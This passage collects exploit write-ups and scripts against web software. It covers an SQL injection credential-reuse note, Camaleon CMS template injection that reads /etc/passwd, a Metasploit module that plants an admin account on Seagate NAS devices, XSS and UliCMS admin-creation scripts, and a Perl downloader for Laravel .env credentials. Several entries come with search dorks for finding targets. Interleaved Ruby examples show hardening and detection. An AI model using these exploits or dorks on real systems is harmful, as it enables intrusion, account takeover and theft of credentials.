<pre><code># Exploit Title: SQL Injection - credentials from one site can be used on other sites<br />- Google Dork:" Designed and Developed by e-Biz Technocrats Pvt.Ltd "<br />- Date: 05/11/2023<br />- Exploit Author: K1LL3rB4LL<br />- Tested on: Mac, Windows, Linux<br /><br />Description:<br /><br />The vulnerability found is an SQL injection. The site can be tested with an automated SQL injection tool or by injecting manually; once the credentials are gathered, a reverse IP lookup shows the other websites hosted on the same server.<br /><br />Vuln column count: 5<br />Vuln columns: 3,4<br />Type of SQL: WAF<br />Username: admin<br />Password: 123456<br />admin panel: site.com/admin<br /><br />Details: After gathering credentials through the SQL injection on one site (site A), the same credentials can be used to access other websites on the same IP or built by the same developer; if you manage to get access and upload a PHP script or backdoor, you can reach other sites in their public_html, or sites connected to that website, which share the same server. If you look at those sites, they share the same developer. On sites that do not have the same credentials, the same SQL injection still works with the same column count, vulnerable column number and the database where the admin credentials are stored.<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Jobs Portal V 3.6 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://codecanyon.net/item/jobs-portal-job-board-laravel-script/22607607 | <br />| # Dork : "Our partners make Milestone products more dynamic " |<br /> "Vestibulum vel nibh et erat faucibus Category : Jobseekers, General" |<br /> "Design by: eCreativeSolutions" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability comes from leaving the default settings in place<br /> during installation of the script and keeping the default username and password.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : user=buyer@buyer.com & pass=buyer123456 <br /><br />[+] https://localhost.com/admin/edit-site-setting<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Exploit Title: Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)<br />Exploit Author: PARAG BAGUL<br />CVE: CVE-2023-30145<br /><br />## Description<br />Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template<br />Injection (SSTI) vulnerability via the formats parameter.<br /><br />## Affected Component<br />All versions below 2.7.0 are affected.<br /><br />## Author<br />Parag Bagul<br /><br />## Steps to Reproduce<br />1. Open the target URL: `https://target.com/admin/media/upload`<br />2. Upload any file and intercept the request.<br />3. In the `formats` parameter value, add the payload `test<%= 7*7 %>test`.<br />4. Check the response. It should contain the result of 7*7 (49) embedded in the<br />message, e.g. "File format not allowed (dqopi49vuuvm)".<br /><br />## Detection<br /><br />Request:<br /><br />POST /admin/media/upload?actions=false HTTP/1.1<br />Host: target.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: /<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://target.com/admin/profile/edit<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------327175120238370517612522354688<br />Content-Length: 1200<br />Origin: http://target.com<br />DNT: 1<br />Connection: close<br />Cookie: cookie<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="file_upload"; filename="test.txt"<br />Content-Type: text/plain<br /><br />test<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="versions"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="thumb_size"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="formats"<br /><br />test<%= 7*7 %>test<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="media_formats"<br /><br />image<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="dimension"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="private"<br /><br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="folder"<br /><br />/<br />-----------------------------327175120238370517612522354688<br />Content-Disposition: form-data; name="skip_auto_crop"<br /><br />true<br />-----------------------------327175120238370517612522354688--<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-8<br />Connection: close<br />Status: 200 OK<br />Cache-Control: max-age=0, private, must-revalidate<br />Set-Cookie: cookie<br />Content-Length: 41<br /><br />File format not allowed (test49test)<br /><br />## Exploitation<br /><br />To execute Ruby code on the server (here, reading /etc/passwd) rather than only arithmetic, use the following payload:<br />testqopi<%= File.open('/etc/passwd').read %>fdtest<br /><br />Request:<br /><br />POST /admin/media/upload?actions=true HTTP/1.1<br />Host: target.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: /<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: http://target.com/admin/media<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------104219633614133026962934729021<br />Content-Length: 1237<br />Origin: http://target.com<br />DNT: 1<br />Connection: close<br />Cookie: cookie<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="file_upload"; filename="test.txt"<br />Content-Type: text/plain<br /><br />test<br /><br 
/>-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="versions"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="thumb_size"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="formats"<br /><br />dqopi<%= File.open('/etc/passwd').read %>fdfdsf<br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="media_formats"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="dimension"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="private"<br /><br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="folder"<br /><br />/<br />-----------------------------104219633614133026962934729021<br />Content-Disposition: form-data; name="skip_auto_crop"<br /><br />true<br />-----------------------------104219633614133026962934729021--<br /><br />Response:<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html; charset=utf-8<br />Connection: close<br />Status: 200 OK<br />Set-Cookie: cookie<br />Content-Length: 1816<br /><br />File format not allowed (dqopiroot:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br 
/>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />fdfdsf)<br /><br /></code></pre>
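The detection step in the Camaleon report works because the `formats` value is compiled as a template instead of being treated as data. The Ruby script below is an added example, not Camaleon CMS code: it contrasts a hypothetical handler that builds its error message through ERB (the vulnerable pattern) with one that keeps the value as plain, escaped data, and adds a request-parameter check that flags template delimiters so such probes can be logged before they reach any template engine. The function names, the delimiter list and the sample parameters are constructed for this example (the parameter names mirror the form fields in the report).

```ruby
require 'erb'

# Vulnerable pattern (hypothetical, for illustration only): a user-controlled
# value is spliced into a template string that ERB then compiles and evaluates,
# so anything between <%= %> in the value runs as Ruby.
def vulnerable_error_message(formats)
  ERB.new("File format not allowed (#{formats})").result(binding)
end

# Hardened pattern: the value is only ever data. It is interpolated into a fixed
# string after any template stage and HTML-escaped for output, so <%= %> in the
# input is shown literally and never evaluated.
def safe_error_message(formats)
  "File format not allowed (#{ERB::Util.html_escape(formats)})"
end

# Detection: delimiters of the common server-side template languages
# (ERB, Jinja/Twig-style braces, shell/JS-style ${}). A value carrying these in
# an upload form is a probe worth logging whether or not the app is vulnerable.
TEMPLATE_DELIMITERS = /<%[=\-]?|%>|\{\{|\}\}|\$\{/

def template_probe?(value)
  !!(value.to_s =~ TEMPLATE_DELIMITERS)
end

# Returns the names of all request parameters that look like template probes.
def suspicious_params(params)
  params.select { |_name, value| template_probe?(value) }.keys
end

# Constructed request parameters, modelled on the form fields in the report.
SAMPLE_PARAMS = {
  'formats'        => 'test<%= 7*7 %>test',
  'media_formats'  => 'image',
  'folder'         => '/',
  'skip_auto_crop' => 'true'
}.freeze

if __FILE__ == $0
  puts "vulnerable: #{vulnerable_error_message(SAMPLE_PARAMS['formats'])}"
  puts "hardened:   #{safe_error_message(SAMPLE_PARAMS['formats'])}"
  puts "flagged:    #{suspicious_params(SAMPLE_PARAMS).inspect}"
end
```

The hardened message still tells the user which format was rejected; what changes is that the value never passes through `ERB.new`, which is the only place the injected expression could be evaluated.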
<pre><code>##<br /># Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)<br /># Date: Dec 9 2019<br /># Exploit Author: Ege Balci<br /># Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/<br /># Version: 2015.0916<br /># CVE : 2020-6627<br /><br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'net/http'<br />require 'net/ssh'<br />require 'net/ssh/command_stream'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::SSH<br /><br /> def initialize(info={})<br /> super(update_info(info,<br /> 'Name' => "Seagate Central External NAS Arbitrary User Creation",<br /> 'Description' => %q{<br /> This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.<br /> Subject product suffers several critical vulnerabilities such as broken access control. 
It makes it possible to change the device state<br /> and register a new admin user which is capable of SSH access.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Ege Balcı <egebalci@pm.me>' # author & msf module<br /> ],<br /> 'References' =><br /> [<br /> ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],<br /> ['CVE', '2020-6627']<br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'SSL' => false,<br /> 'WfsDelay' => 5,<br /> },<br /> 'Platform' => ['unix'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Payload' =><br /> {<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd_interact',<br /> 'ConnectionType' => 'find'<br /> }<br /> },<br /> 'Targets' =><br /> [<br /> ['Auto',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD<br /> }<br /> ],<br /> ],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => "Dec 9 2019",<br /> 'DefaultTarget' => 0<br /> ))<br /><br /><br /> register_options(<br /> [<br /> OptString.new('USER', [ true, 'Seagate Central SSH user', '']),<br /> OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])<br /> ], self.class<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),<br /> OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])<br /> ]<br /> )<br /><br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> }<br /> },60)<br /><br /> if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')<br /> Exploit::CheckCode::Appears<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def exploit<br /><br /> # First get current state<br /> first_state=get_state()<br /> if first_state<br /> print_status("Current 
device state: #{first_state['state']}")<br /> else<br /> return<br /> end<br /><br /> if first_state['state'] != 'start'<br /> # Set new start state<br /> first_state['state'] = 'start'<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "info=#{first_state.to_json}"<br /> },60)<br /><br /> changed_state=get_state()<br /> if changed_state && changed_state['state'] == 'start'<br /> print_good("State successfully changed !")<br /> else<br /> print_error("Could not change device state")<br /> return<br /> end<br /> end<br /><br /> name = Rex::Text.rand_name_male<br /> user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"<br /> pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)<br /><br /> print_status('Creating new admin user...')<br /> print_status("User: #{user}")<br /> print_status("Pass: #{pass}")<br /><br /> # Add new admin user<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> },<br /> 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}<br /> },60)<br /><br /><br /> conn = do_login(user,pass)<br /> if conn<br /> print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")<br /> handler(conn.lsock)<br /> end<br /><br /> end<br /><br /><br /><br /> def do_login(user, pass)<br /> factory = ssh_socket_factory<br /> opts = {<br /> :auth_methods => ['password', 'keyboard-interactive'],<br /> :port => 22,<br /> :use_agent => false,<br /> :config => false,<br /> :password => pass,<br /> :proxy => factory,<br /> :non_interactive => true,<br /> :verify_host_key => :never<br /> }<br /><br 
/> opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']<br /><br /> begin<br /> ssh = nil<br /> ::Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> ssh = Net::SSH.start(rhost, user, opts)<br /> end<br /> rescue Rex::ConnectionError<br /> fail_with Failure::Unreachable, 'Connection failed'<br /> rescue Net::SSH::Disconnect, ::EOFError<br /> print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"<br /> return<br /> rescue ::Timeout::Error<br /> print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"<br /> return<br /> rescue Net::SSH::AuthenticationFailed<br /> print_error "#{rhost}:#{rport} SSH - Failed authentication"<br /> rescue Net::SSH::Exception => e<br /> print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"<br /> return<br /> end<br /><br /> if ssh<br /> conn = Net::SSH::CommandStream.new(ssh)<br /> ssh = nil<br /> return conn<br /> end<br /><br /> return nil<br /> end<br /><br /> def get_state<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),<br /> 'headers' => {<br /> 'X-Requested-With' => 'XMLHttpRequest'<br /> }<br /> },60)<br /><br /> if res && (res.code == 200 ||res.code == 100)<br /> return res.get_json_document<br /> end<br /> res = nil<br /> end<br />end<br /> <br /></code></pre>
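The module above drives four unauthenticated endpoints that the device owner can watch for: `get_firmware` (fingerprinting), `json_get_start_info` (reading the setup state), `set_start_info` (re-entering setup state) and `add_edit_user` (creating an administrator). The Ruby script below is an added example for the defender's side and is not part of the Metasploit module; it parses web-server access-log lines in the common combined format and reports, per client address, which of those endpoints were touched and whether the state-change-plus-user-creation sequence the module performs appears from one address. The endpoint paths are taken from the module; the log lines are constructed and the combined format is an assumption about how the device (or a reverse proxy in front of it) logs.

```ruby
# Endpoints the exploit drives, in the order it uses them. The paths come from
# the module; everything else in this file is constructed for the example.
WATCHED_ENDPOINTS = {
  '/index.php/Start/get_firmware'        => :fingerprint,
  '/index.php/Start/json_get_start_info' => :read_state,
  '/index.php/Start/set_start_info'      => :change_state,
  '/index.php/Start/add_edit_user'       => :create_user
}.freeze

# Combined log format: ip - user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

Event = Struct.new(:ip, :time, :method, :path, :status, :stage)

# Parses one line and returns an Event when it hits a watched endpoint, else nil.
# The query string is dropped before the lookup so "?x=1" cannot hide a hit.
def watched_event(line)
  m = LOG_LINE.match(line) or return nil
  path = m[:path].split('?').first
  stage = WATCHED_ENDPOINTS[path] or return nil
  Event.new(m[:ip], m[:time], m[:method], path, m[:status].to_i, stage)
end

# Groups watched events by client and flags clients that both changed the device
# state and created a user: the combination the module performs.
def analyse(lines)
  by_ip = Hash.new { |h, k| h[k] = [] }
  lines.each { |l| (e = watched_event(l)) && by_ip[e.ip] << e }
  by_ip.map do |ip, events|
    stages = events.map(&:stage).uniq
    {
      ip: ip,
      stages: stages,
      account_takeover: stages.include?(:change_state) && stages.include?(:create_user)
    }
  end
end

# Constructed sample log (documentation address ranges). 203.0.113.9 runs the
# full sequence; 192.0.2.5 only loads the web UI and one firmware check.
SAMPLE_LOG = <<~LOG
  192.0.2.5 - - [09/Dec/2019:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  203.0.113.9 - - [09/Dec/2019:10:02:11 +0000] "GET /index.php/Start/get_firmware HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.9 - - [09/Dec/2019:10:02:12 +0000] "GET /index.php/Start/json_get_start_info HTTP/1.1" 200 160 "-" "Mozilla/5.0"
  203.0.113.9 - - [09/Dec/2019:10:02:13 +0000] "POST /index.php/Start/set_start_info HTTP/1.1" 200 2 "-" "Mozilla/5.0"
  203.0.113.9 - - [09/Dec/2019:10:02:15 +0000] "POST /index.php/Start/add_edit_user HTTP/1.1" 200 2 "-" "Mozilla/5.0"
  192.0.2.5 - - [09/Dec/2019:10:03:00 +0000] "GET /index.php/Start/get_firmware?x=1 HTTP/1.1" 200 87 "-" "Mozilla/5.0"
LOG

def sample_report
  analyse(SAMPLE_LOG.lines.map(&:chomp))
end

if __FILE__ == $0
  sample_report.each do |r|
    puts "#{r[:ip]} stages=#{r[:stages].join(',')} takeover=#{r[:account_takeover]}"
  end
end
```

A single `get_firmware` hit is only a fingerprint and is reported as such; the report escalates a client to `account_takeover` only when it has also changed the start state and created a user, which is what distinguishes the module's traffic from a browser loading the UI.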
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)<br /># Google Dork: intitle:"SCM Manager" intext:1.60<br /># Date: 05-25-2023<br /># Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)<br /># Vendor Homepage: https://scm-manager.org/<br /># Software Link: https://scm-manager.org/docs/1.x/en/getting-started/<br /># Version: 1.2 <= 1.60<br /># Tested on: Debian based<br /># CVE: CVE-2023-33829<br /><br /># Modules<br />import requests<br />import argparse<br />import sys<br /><br /># Main menu<br />parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')<br />parser.add_argument("-u", "--user", required=True, help="Admin user or user with write permissions")<br />parser.add_argument("-p", "--password", required=True, help="password of the user")<br />args = parser.parse_args()<br /><br /><br /># Credentials (read from the parsed arguments rather than fixed argv positions,<br /># so -u/-p work in either order)<br />user = args.user<br />password = args.password<br /><br /><br /># Global Variables<br />main_url = "http://localhost:8080/scm" # Change URL if necessary<br />auth_url = main_url + "/api/rest/authentication/login.json"<br />users = main_url + "/api/rest/users.json"<br />groups = main_url + "/api/rest/groups.json"<br />repos = main_url + "/api/rest/repositories.json"<br /><br /># Create a session<br />session = requests.Session()<br /><br /># Credentials to send<br />post_data={<br /> 'username': user, # change if you have any other user with write permissions<br /> 'password': password # change if you have any other user with write permissions<br />}<br /><br />r = session.post(auth_url, data=post_data)<br /><br />if r.status_code == 200:<br /> print("[+] Authentication successful")<br />else:<br /> print("[-] Failed to authenticate")<br /> sys.exit(1)<br /><br />new_user={<br /><br /> "name": "newUser",<br /> "displayName": "<img src=x onerror=alert('XSS')>",<br /> "mail": "",<br /> "password": "",<br /> "admin": False,<br /> "active": True,<br /> "type": "xml"<br /><br />}<br /><br />create_user = session.post(users, json=new_user)<br />print("[+] User with XSS Payload created")<br /><br />new_group={<br /><br /> "name": "newGroup",<br /> "description": "<img src=x onerror=alert('XSS')>",<br /> "type": "xml"<br /><br />}<br /><br />create_group = session.post(groups, json=new_group)<br />print("[+] Group with XSS Payload created")<br /><br />new_repo={<br /><br /> "name": "newRepo",<br /> "type": "svn",<br /> "contact": "",<br /> "description": "<img src=x onerror=alert('XSS')>",<br /> "public": False<br /><br />}<br /><br />create_repo = session.post(repos, json=new_repo)<br />print("[+] Repository with XSS Payload created")<br /> <br /><br /></code></pre>
<pre><code>#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment<br />#Application: Ulicms<br />#Version: 2023.1-sniffing-vicuna<br />#Bugs: create admin user via mass assignment<br />#Technology: PHP<br />#Vendor URL: https://en.ulicms.de/<br />#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip<br />#Date of found: 04-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna<br /><br />import requests<br /><br />new_name=input("name: ")<br />new_email=input("email: ")<br />new_pass=input("password: ")<br /><br />url = "http://localhost/dist/admin/index.php"<br /><br />headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /><br />data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="<br /><br />response = requests.post(url, headers=headers, data=data)<br /><br />if response.status_code == 200:<br /> print("Request is success and created new admin account")<br /> <br />else:<br /> print("Request is failure.!!")<br /> <br /> <br />#POC video : https://youtu.be/SCkRJzJ0FVk<br /><br /></code></pre>
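The UliCMS request above works because every form field, including `admin=1` and `group_id=1`, is copied straight into the new user record. The Ruby below is an added example rather than UliCMS code (UliCMS is PHP): it models a hypothetical user-creation handler that assigns whatever the request carries, beside one that only accepts an explicit allowlist of fields, sets the privilege fields from the caller's own rights, and returns the rejected keys so the attempt can be logged. The field names mirror the request in the report; the handler, the record shape and the sample values (placeholders, not real credentials) are assumptions made for the example, and password hashing is left out to keep the focus on assignment.

```ruby
require 'uri'

# Fields a "create user" form may legitimately set. The privilege-bearing
# fields admin and group_id are deliberately absent from this list.
PERMITTED_USER_FIELDS = %w[username firstname lastname email password password_repeat default_language].freeze

# Fields that grant privilege. Never taken from the request of a non-admin caller.
PRIVILEGED_FIELDS = %w[admin group_id].freeze

# Routing keys carried by the report's request; they are not user fields.
ROUTING_KEYS = %w[sClass sMethod add_admin].freeze

# Decodes an application/x-www-form-urlencoded body into a Hash of user fields.
def parse_form_body(body)
  URI.decode_www_form(body).each_with_object({}) do |(key, value), fields|
    next if ROUTING_KEYS.include?(key)
    fields[key] = value
  end
end

# Vulnerable pattern (hypothetical): every request key becomes a record column,
# so the request decides whether the new account is an administrator.
def create_user_mass_assign(params)
  record = { 'admin' => 0, 'group_id' => nil }
  params.each { |key, value| record[key] = value }
  record
end

# Hardened pattern: copy only allowlisted fields, decide privileges from the
# caller's rights, and report the rejected keys for audit logging.
def create_user_permitted(params, caller_is_admin: false)
  permitted = params.select { |key, _| PERMITTED_USER_FIELDS.include?(key) }
  rejected  = params.keys - permitted.keys
  record    = permitted.merge('admin' => 0, 'group_id' => nil)
  if caller_is_admin
    record['admin']    = params['admin'].to_s == '1' ? 1 : 0
    record['group_id'] = params['group_id']
  end
  {
    record: record,
    rejected: rejected,
    # A non-admin caller submitting privilege fields is worth an alert.
    privilege_escalation_attempt: !caller_is_admin && (rejected & PRIVILEGED_FIELDS).any?
  }
end

# Constructed body with the same field layout as the report's request.
SAMPLE_BODY = 'sClass=UserController&sMethod=create&add_admin=add_admin' \
              '&username=eve&firstname=eve&lastname=eve&email=eve%40example.invalid' \
              '&password=placeholder&password_repeat=placeholder' \
              '&group_id=1&admin=1&default_language='

if __FILE__ == $0
  params = parse_form_body(SAMPLE_BODY)
  puts "mass assignment: #{create_user_mass_assign(params).inspect}"
  puts "allowlisted:     #{create_user_permitted(params).inspect}"
end
```

Run as a script it prints both records side by side: the mass-assigned one carries `admin` and `group_id` exactly as submitted, while the allowlisted one keeps `admin` at 0, drops `group_id`, and lists the two rejected keys together with the escalation flag.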
<pre><code>Exploit Title: Zenphoto 1.6 - Multiple stored XSS<br />Application: Zenphoto-1.6 xss poc<br />Version: 1.6 <br />Bugs: XSS<br />Technology: PHP<br />Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/<br />Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip<br />Date of found: 01-05-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br /><br /><br />2. Technical Details & POC<br />========================================<br />###XSS-1###<br />steps: <br />1. Create a new album<br />2. Set the Album Description to: <iframe src="https://14.rs"></iframe> <br />3. Save and view the album at http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/<br /><br />=====================================================<br />###XSS-2###<br />steps: <br />1. Go to the user account and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)<br />2. Change the postal code to <script>alert(4)</script><br />3. If the admin user information is imported as HTML, the XSS will trigger<br /><br />poc video : https://youtu.be/JKdC980ZbLY<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Laravel 10.11 Information Disclosure MySQL Credential Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : https://laravel.com/ | <br />| # Dork : db_password filetype:env |<br /> "Whoops! There was an error." |<br />====================================================================================================================================<br /><br />note : <br /><br />[+] 1 : <br /> <br />Laravel's default .env file contains some common configuration values that may differ based on whether your application <br />is running locally or on a production web server. These values are then retrieved from various Laravel configuration files <br />within the config directory using Laravel's env function.<br /><br />[+] 2 : If no custom error page is configured, the framework's error page displays sensitive information such as hosting passwords, database credentials, etc.<br /><br />[+] Poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : /.env ( depending on the server's protection, the file is either displayed directly, offered as a download, or not returned at all )<br /><br />[+] https://127.0.0.1/lala/.env <br /><br />====================================================================================================================================<br />| # Title : Laravel 10.11 sensitive information disclosure Vulnerability |<br />====================================================================================================================================<br /><br />poc : <br /><br /><br />[+] If no custom error page is configured, the framework's error page displays sensitive information such as hosting passwords, database credentials, etc.<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] https://127.0.0.1/lalaland/categorie/avant_apres/<br /><br />[+] https://youtu.be/tz_w563Nyac <br /><br />====================================================================================================================================<br />| # Title : Laravel 10.11 Database Disclosure Exploit |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the configuration file:<br /><br /> The following Perl script attempts to download the .env file.<br /> The .env file contains common configuration values and the connection information for the script's database.<br /> Through the code you can control where the downloaded file is saved.<br /> <br />[+] Dorking in Google or another search engine.<br /><br />[+] Save the code as a Perl file: poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br /># Author : indoushka<br /><br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print "\n[+] Laravel from Version 1.0 to 9.47.0 Database Disclosure [+] \n\n";<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[+] Author : indoushka \n\n";<br />print "[-] How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br /># The directory is given; ".env" is appended by the script itself.<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path) = @ARGV;<br /><br />$File=".env";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/.env");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/.env\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
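The three Laravel items above come down to two configuration mistakes: dotfiles under the web root being served, and `APP_DEBUG` left on so the error page prints the environment. The Ruby below is an added example, not Laravel's or the advisory's own code: it audits a `.env` text for the settings that cause the disclosure (`APP_DEBUG`, `APP_ENV`, `APP_KEY` and `DB_PASSWORD` are Laravel's standard variable names) and decides whether a request path should be refused at the web server, undoing percent-encoding and `..` segments first so encoded or traversal variants of `/.env` are treated the same as the plain form. The sample `.env` contents are constructed and the key value is a placeholder.

```ruby
require 'uri'

# Parses KEY=value lines of a dotenv file, ignoring comments and blank lines.
def parse_dotenv(text)
  text.each_line.with_object({}) do |line, env|
    line = line.strip
    next if line.empty? || line.start_with?('#')
    key, value = line.split('=', 2)
    env[key.strip] = value.to_s.strip.delete_prefix('"').delete_suffix('"')
  end
end

# Returns findings for the settings that turn a Laravel error page, or a served
# .env file, into a credential leak.
def audit_laravel_env(text)
  env = parse_dotenv(text)
  findings = []
  if env['APP_DEBUG'].to_s.downcase == 'true'
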